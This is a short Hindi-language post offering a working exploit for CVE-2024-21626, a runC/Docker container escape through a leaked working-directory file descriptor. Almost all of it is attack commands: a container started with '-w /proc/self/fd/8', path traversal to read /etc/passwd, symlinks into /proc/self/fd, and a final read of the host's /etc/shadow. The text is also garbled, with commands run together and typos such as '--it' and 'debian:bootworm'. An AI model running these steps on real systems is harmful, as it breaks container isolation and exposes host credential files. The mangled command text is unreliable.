
CVE-2024-21626 के लिए कार्यशील शोषण, एक runC/Docker कंटेनर एस्केप जो कार्यशील निर्देशिका सिमलिंक हमले के माध्यम से होता है, जो होस्ट फाइलसिस्टम तक पहुंच प्रदान करता है।
docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
-w /proc/self/fd/8 रखें\cat ../../../../../../../../../etc/passwd कमांड का उपयोग करेंdocker run --name cve-2024-21626 --rm --it debian:bootwormln -sf /proc/self/fd/7/ /fooln -sf /proc/self/fd/8/ /bardocker exec -it -w /bar cve-2024-21626 sleep 120ls -F /proccat /proc/9/cmdline (sleep कमांड का PID खोजें)cat /proc/9/cwd/../../../../../etc/shadow